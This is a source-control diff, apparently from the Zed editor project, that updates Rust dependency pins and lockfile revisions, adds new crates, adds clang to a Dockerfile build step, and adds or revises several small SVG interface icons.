[[package]]
name = "pet-pyenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12340,7 +12455,7 @@ dependencies = [
[[package]]
name = "pet-python-utils"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12357,7 +12472,7 @@ dependencies = [
[[package]]
name = "pet-reporter"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"log",
@@ -12371,7 +12486,7 @@ dependencies = [
[[package]]
name = "pet-telemetry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"env_logger 0.10.2",
"lazy_static",
@@ -12386,7 +12501,7 @@ dependencies = [
[[package]]
name = "pet-uv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"pet-core",
@@ -12398,7 +12513,7 @@ dependencies = [
[[package]]
name = "pet-venv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12410,7 +12525,7 @@ dependencies = [
[[package]]
name = "pet-virtualenv"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12422,7 +12537,7 @@ dependencies = [
[[package]]
name = "pet-virtualenvwrapper"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"log",
"msvc_spectre_libs",
@@ -12435,7 +12550,7 @@ dependencies = [
[[package]]
name = "pet-windows-registry"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12453,7 +12568,7 @@ dependencies = [
[[package]]
name = "pet-windows-store"
version = "0.1.0"
-source = "git+https://github.com/microsoft/python-environment-tools.git?rev=d5b5bb0c4558a51d8cc76b514bc870fd1c042f16#d5b5bb0c4558a51d8cc76b514bc870fd1c042f16"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
dependencies = [
"lazy_static",
"log",
@@ -12466,6 +12581,20 @@ dependencies = [
"winreg 0.55.0",
]
+[[package]]
+name = "pet-winpython"
+version = "0.1.0"
+source = "git+https://github.com/microsoft/python-environment-tools.git?rev=9e61a22af989fe54937bf07c9f9cff1bc53d9056#9e61a22af989fe54937bf07c9f9cff1bc53d9056"
+dependencies = [
+ "lazy_static",
+ "log",
+ "pet-core",
+ "pet-fs",
+ "pet-python-utils",
+ "pet-virtualenv",
+ "regex",
+]
+
[[package]]
name = "petgraph"
version = "0.6.5"
@@ -134,6 +134,7 @@ members = [
"crates/notifications",
"crates/ollama",
"crates/onboarding",
+ "crates/opencode",
"crates/open_ai",
"crates/open_path_prompt",
"crates/open_router",
@@ -381,6 +382,7 @@ node_runtime = { path = "crates/node_runtime" }
notifications = { path = "crates/notifications" }
ollama = { path = "crates/ollama" }
onboarding = { path = "crates/onboarding" }
+opencode = { path = "crates/opencode" }
open_ai = { path = "crates/open_ai" }
open_path_prompt = { path = "crates/open_path_prompt" }
open_router = { path = "crates/open_router", features = ["schemars"] }
@@ -475,12 +477,11 @@ ztracing_macro = { path = "crates/ztracing_macro" }
# External crates
#
-agent-client-protocol = { version = "=0.9.4", features = ["unstable"] }
+agent-client-protocol = { version = "=0.10.2", features = ["unstable"] }
aho-corasick = "1.1"
alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" }
any_vec = "0.14"
anyhow = "1.0.86"
-arrayvec = { version = "0.7.4", features = ["serde"] }
ashpd = { version = "0.13", default-features = false, features = [
"async-io",
"notification",
@@ -513,7 +514,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] }
aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] }
backtrace = "0.3"
base64 = "0.22"
-bincode = "1.2.1"
bitflags = "2.6.0"
brotli = "8.0.2"
bytes = "1.0"
@@ -551,19 +551,21 @@ derive_more = { version = "2.1.1", features = [
dirs = "4.0"
documented = "0.9.1"
dotenvy = "0.15.0"
+dunce = "1.0"
ec4rs = "1.1"
emojis = "0.6.1"
env_logger = "0.11"
encoding_rs = "0.8"
exec = "0.3.1"
-fancy-regex = "0.16.0"
+fancy-regex = "0.17.0"
fork = "0.4.0"
futures = "0.3"
futures-concurrency = "7.7.1"
futures-lite = "1.13"
-gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" }
+gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" }
git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] }
globset = "0.4"
+heapless = "0.9.2"
handlebars = "4.3"
heck = "0.5"
heed = { version = "0.21.0", features = ["read-txn-no-tls"] }
@@ -572,7 +574,6 @@ human_bytes = "0.4.1"
html5ever = "0.27.0"
http = "1.1"
http-body = "1.0"
-hyper = "0.14"
ignore = "0.4.22"
image = "0.25.1"
imara-diff = "0.1.8"
@@ -597,13 +598,13 @@ markup5ever_rcdom = "0.3.0"
metal = "0.33"
minidumper = "0.9"
moka = { version = "0.12.10", features = ["sync"] }
-naga = { version = "28.0", features = ["wgsl-in"] }
+naga = { version = "29.0", features = ["wgsl-in"] }
nanoid = "0.4"
nbformat = "1.2.0"
nix = "0.29"
num-format = "0.4.4"
objc = "0.2"
-objc2-foundation = { version = "=0.3.1", default-features = false, features = [
+objc2-foundation = { version = "=0.3.2", default-features = false, features = [
"NSArray",
"NSAttributedString",
"NSBundle",
@@ -637,13 +638,13 @@ parse_int = "0.9"
pciid-parser = "0.8.0"
pathdiff = "0.2"
percent-encoding = "2.3.2"
-pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
-pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" }
+pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
+pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" }
portable-pty = "0.9.0"
postage = { version = "0.5", features = ["futures-traits"] }
pretty_assertions = { version = "1.3.0", features = ["unstable"] }
@@ -690,7 +691,6 @@ serde_json_lenient = { version = "0.2", features = [
"raw_value",
] }
serde_path_to_error = "0.1.17"
-serde_repr = "0.1"
serde_urlencoded = "0.7"
sha2 = "0.10"
shellexpand = "2.1.0"
@@ -719,9 +719,8 @@ time = { version = "0.3", features = [
"formatting",
"local-offset",
] }
-tiny_http = "0.8"
+tiny_http = "0.12"
tokio = { version = "1" }
-tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] }
tokio-socks = { version = "0.5.2", default-features = false, features = [
"futures-io",
"tokio",
@@ -753,7 +752,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma
tree-sitter-python = "0.25"
tree-sitter-regex = "0.24"
tree-sitter-ruby = "0.23"
-tree-sitter-rust = "0.24"
+tree-sitter-rust = "0.24.1"
tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347
tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" }
tracing = "0.1.40"
@@ -782,7 +781,8 @@ wax = "0.7"
which = "6.0.0"
wasm-bindgen = "0.2.113"
web-time = "1.1.0"
-wgpu = { git = "https://github.com/zed-industries/wgpu", rev = "465557eccfe77c840a9b4936f1408da9503372c4" }
+webrtc-sys = "0.3.23"
+wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" }
windows-core = "0.61"
yawc = "0.2.5"
zeroize = "1.8"
@@ -850,8 +850,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c
notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" }
windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" }
calloop = { git = "https://github.com/zed-industries/calloop" }
-livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" }
-libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "37835f840d0070d45ac8b31cce6a6ae7aca3f459" }
+livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
+libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
+webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "c1209aa155cbf4543383774f884a46ae7e53ee2e" }
[profile.dev]
split-debuginfo = "unpacked"
@@ -14,8 +14,12 @@ ARG GITHUB_SHA
ENV GITHUB_SHA=$GITHUB_SHA
# Also add `cmake`, since we need it to build `wasmtime`.
+# clang is needed because `webrtc-sys` uses Clang-specific compiler flags.
RUN apt-get update; \
- apt-get install -y --no-install-recommends cmake
+ apt-get install -y --no-install-recommends cmake clang
+
+ENV CC=clang
+ENV CXX=clang++
RUN --mount=type=cache,target=./script/node_modules \
--mount=type=cache,target=/usr/local/cargo/registry \
@@ -122,6 +122,5 @@ vim
= @probably-neb
windows
- = @localcc
= @reflectronic
= @Veykril
@@ -0,0 +1,3 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M11.2 3.2H4.8V12.8H11.2V3.2ZM14.4 16H1.6V0H14.4V16Z" fill="black"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M13.4 2.60001H2.6C2.26863 2.60001 2 2.86864 2 3.20001V5.00001C2 5.33138 2.26863 5.60001 2.6 5.60001H13.4C13.7314 5.60001 14 5.33138 14 5.00001V3.20001C14 2.86864 13.7314 2.60001 13.4 2.60001Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M3.2 5.60004V12.2C3.2 12.5183 3.32643 12.8235 3.55147 13.0486C3.77651 13.2736 4.08174 13.4 4.4 13.4H11.6C11.9183 13.4 12.2235 13.2736 12.4485 13.0486C12.6736 12.8235 12.8 12.5183 12.8 12.2V5.60004" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.8 8H9.2" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M9.5248 9.52487C9.32192 9.74576 9.07604 9.92297 8.80229 10.0457C8.52854 10.1685 8.23269 10.2341 7.93287 10.2384C7.63305 10.2427 7.33543 10.1857 7.05826 10.0709C6.78109 9.95608 6.53019 9.78592 6.32115 9.57088C6.11211 9.35584 5.94929 9.10052 5.84242 8.82002C5.73556 8.53953 5.68693 8.23974 5.69959 7.93908C5.71225 7.63842 5.78588 7.34389 5.9159 7.07326C6.04593 6.80263 6.22978 6.56148 6.45605 6.36487" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.58521 3.93988C7.04677 3.8469 7.51825 3.80005 7.99115 3.80055C9.27177 3.80055 10.5219 4.18055 11.584 4.89055C12.6461 5.60055 13.472 6.61055 13.956 7.79055C13.9839 7.85737 13.9989 7.92893 14 8.00131C14.0011 8.07369 13.9882 8.14566 13.9622 8.21327C13.706 8.81927 13.3778 9.39377 12.9841 9.92417" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M3.48047 5.37988C2.85585 5.97555 2.36015 6.69431 2.02605 7.49388C1.90005 7.80488 1.90005 8.15188 2.02605 8.46288C2.52405 9.64988 3.35605 10.6599 4.41705 11.3699C5.47805 12.0799 6.72205 12.4559 7.99305 12.4559C9.01905 12.4559 10.0291 12.2019 10.9311 11.7179" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M2 2L14 14" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 9.5C8.82843 9.5 9.5 8.82843 9.5 8C9.5 7.17157 8.82843 6.5 8 6.5C7.17157 6.5 6.5 7.17157 6.5 8C6.5 8.82843 7.17157 9.5 8 9.5Z" fill="#C6CAD0"/>
+<path d="M2.25 4.80555V3.52777C2.25 3.18889 2.38462 2.86388 2.62425 2.62425C2.86388 2.38462 3.18889 2.25 3.52777 2.25H4.80555" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.1945 2.25H12.4722C12.8111 2.25 13.1361 2.38462 13.3758 2.62425C13.6154 2.86388 13.75 3.18889 13.75 3.52777V4.80555" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M13.75 11.1945V12.4722C13.75 12.8111 13.6154 13.1361 13.3758 13.3758C13.1361 13.6154 12.8111 13.75 12.4722 13.75H11.1945" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.80555 13.75H3.52777C3.18889 13.75 2.86388 13.6154 2.62425 13.3758C2.38462 13.1361 2.25 12.8111 2.25 12.4722V11.1945" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 7.29524V10.6536" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.3208 8.97442H9.67917" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M12.8 13C13.1183 13 13.4235 12.8761 13.6486 12.6554C13.8735 12.4349 14 12.1356 14 11.8236V5.94118C14 5.62916 13.8735 5.32992 13.6486 5.10929C13.4235 4.88866 13.1183 4.76471 12.8 4.76471H8.06C7.8593 4.76664 7.66133 4.71919 7.48418 4.6267C7.30703 4.53421 7.15637 4.39964 7.046 4.2353L6.56 3.52941C6.45073 3.36675 6.30199 3.23322 6.1271 3.14082C5.95221 3.04842 5.75666 3.00004 5.558 3H3.2C2.88174 3 2.57651 3.12395 2.35148 3.34458C2.12643 3.56521 2 3.86445 2 4.17647V11.8236C2 12.1356 2.12643 12.4349 2.35148 12.6554C2.57651 12.8761 2.88174 13 3.2 13H12.8Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M8 4.32848H10.4477C10.7723 4.32848 11.0835 4.45742 11.3131 4.68693C11.5426 4.91644 11.6715 5.22773 11.6715 5.55232V9.83575" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.32849 8V13.5073" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.16426 2.49272L2.49274 6.16424" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M6.16426 6.16424L2.49274 2.49272" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.6715 13.5073C12.6854 13.5073 13.5073 12.6854 13.5073 11.6715C13.5073 10.6577 12.6854 9.83575 11.6715 9.83575C10.6577 9.83575 9.83575 10.6577 9.83575 11.6715C9.83575 12.6854 10.6577 13.5073 11.6715 13.5073Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,7 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M7.99567 13.0812C8.93101 13.0812 9.68925 12.3229 9.68925 11.3876C9.68925 10.4522 8.93101 9.694 7.99567 9.694C7.06033 9.694 6.30209 10.4522 6.30209 11.3876C6.30209 12.3229 7.06033 13.0812 7.99567 13.0812Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M4.61023 6.30643C5.54557 6.30643 6.30381 5.54819 6.30381 4.61286C6.30381 3.67752 5.54557 2.91928 4.61023 2.91928C3.6749 2.91928 2.91666 3.67752 2.91666 4.61286C2.91666 5.54819 3.6749 6.30643 4.61023 6.30643Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.3915 6.30643C12.3268 6.30643 13.0851 5.54819 13.0851 4.61286C13.0851 3.67752 12.3268 2.91928 11.3915 2.91928C10.4561 2.91928 9.69791 3.67752 9.69791 4.61286C9.69791 5.54819 10.4561 6.30643 11.3915 6.30643Z" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M11.3889 6.306V7.43505C11.3889 7.77377 11.1631 7.99958 10.8244 7.99958H5.17912C4.8404 7.99958 4.61459 7.77377 4.61459 7.43505V6.306" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path d="M8 8V9.69358" stroke="#A9AFBC" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path opacity="0.2" d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path opacity="0.2" d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -0,0 +1,6 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path opacity="0.2" d="M12.5 3V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M9.5 6V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M6.5 9V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+<path d="M3.5 12V14" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round"/>
+</svg>
@@ -1,3 +1,3 @@
<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M5 10.8V5.2C5 5.08954 5.08954 5 5.2 5H10.8C10.9105 5 11 5.08954 11 5.2V10.8C11 10.9105 10.9105 11 10.8 11H5.2C5.08954 11 5 10.9105 5 10.8Z" fill="black" stroke="black" stroke-width="1.2" stroke-linejoin="round"/>
+<path d="M4.5 11.2667V4.73333C4.5 4.60446 4.60446 4.5 4.73333 4.5H11.2667C11.3956 4.5 11.5 4.60446 11.5 4.73333V11.2667C11.5 11.3956 11.3956 11.5 11.2667 11.5H4.73333C4.60446 11.5 4.5 11.3956 4.5 11.2667Z" fill="#C6CAD0" stroke="#C6CAD0" stroke-width="1.2" stroke-linejoin="round"/>
</svg>
@@ -1,3 +1,4 @@
<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M6.31254 12.549C7.3841 13.0987 8.61676 13.2476 9.78839 12.9688C10.96 12.6901 11.9936 12.0021 12.7028 11.0287C13.412 10.0554 13.7503 8.8607 13.6566 7.66002C13.5629 6.45934 13.0435 5.33159 12.1919 4.48C11.3403 3.62841 10.2126 3.10898 9.01188 3.01531C7.8112 2.92164 6.61655 3.2599 5.64319 3.96912C4.66984 4.67834 3.9818 5.71188 3.70306 6.88351C3.42432 8.05514 3.5732 9.2878 4.12289 10.3594L3 13.6719L6.31254 12.549Z" stroke="black" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
+<path opacity="0.12" d="M6.31254 12.549C7.3841 13.0987 8.61676 13.2476 9.78839 12.9688C10.96 12.6901 11.9936 12.0021 12.7028 11.0287C13.412 10.0554 13.7503 8.8607 13.6566 7.66002C13.5629 6.45934 13.0435 5.33159 12.1919 4.48C11.3403 3.62841 10.2126 3.10898 9.01188 3.01531C7.8112 2.92164 6.61655 3.2599 5.64319 3.96912C4.66984 4.67834 3.9818 5.71188 3.70306 6.88351C3.42432 8.05514 3.5732 9.2878 4.12289 10.3594L3 13.6719L6.31254 12.549Z" fill="#C6CAD0"/>
+<path d="M5.97658 12.549C7.04814 13.0987 8.2808 13.2476 9.45243 12.9688C10.624 12.6901 11.6576 12.0021 12.3668 11.0287C13.076 10.0554 13.4143 8.8607 13.3206 7.66002C13.2269 6.45934 12.7075 5.33159 11.8559 4.48C11.0043 3.62841 9.87664 3.10898 8.67592 3.01531C7.47524 2.92164 6.28059 3.2599 5.30723 3.96912C4.33388 4.67834 3.64584 5.71188 3.3671 6.88351C3.08836 8.05514 3.23724 9.2878 3.78693 10.3594L2.66404 13.6719L5.97658 12.549Z" stroke="#C6CAD0" stroke-width="1.2" stroke-linecap="round" stroke-linejoin="round"/>
</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.1" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 7 2)" fill="#C6CAD0"/>
+<path d="M7 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.8" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 7 2)" fill="#C6CAD0"/>
+<path d="M7 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.1" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 14 2)" fill="#C6CAD0"/>
+<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -0,0 +1,5 @@
+<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
+<rect opacity="0.8" width="5" height="12" rx="2" transform="matrix(-1 0 0 1 14 2)" fill="#C6CAD0"/>
+<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
+<rect x="2" y="2" width="12" height="12" rx="1.5" stroke="#C6CAD0" stroke-width="1.2"/>
+</svg>
@@ -1,5 +0,0 @@
-<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<rect opacity="0.2" width="7" height="12" rx="2" transform="matrix(-1 0 0 1 9 2)" fill="#C6CAD0"/>
-<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
-<rect x="2" y="2" width="12" height="12" rx="2" stroke="#C6CAD0" stroke-width="1.2"/>
-</svg>
@@ -1,5 +0,0 @@
-<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
-<rect width="7" height="12" rx="2" transform="matrix(-1 0 0 1 9 2)" fill="#C6CAD0"/>
-<path d="M9 2V14" stroke="#C6CAD0" stroke-width="1.2"/>
-<rect x="2" y="2" width="12" height="12" rx="2" stroke="#C6CAD0" stroke-width="1.2"/>
-</svg>
@@ -31,7 +31,6 @@
"ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }],
"ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }],
"ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }],
- "ctrl-,": "zed::OpenSettings",
"ctrl-alt-,": "zed::OpenSettingsFile",
"ctrl-q": "zed::Quit",
